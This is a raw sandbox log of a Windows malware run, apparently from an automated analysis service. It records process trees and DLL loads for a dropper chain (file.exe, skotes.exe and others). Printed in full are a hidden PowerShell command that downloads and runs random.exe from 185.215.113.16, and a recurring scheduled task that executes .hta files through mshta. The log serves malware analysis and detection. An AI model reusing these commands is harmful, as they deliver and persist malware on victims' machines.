Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A6C3.tmp\A6C4.tmp\A6C5.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A859.tmp\A85A.tmp\A85B.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E870.tmp\E871.tmp\E881.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E9E7.tmp\E9E8.tmp\E9E9.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
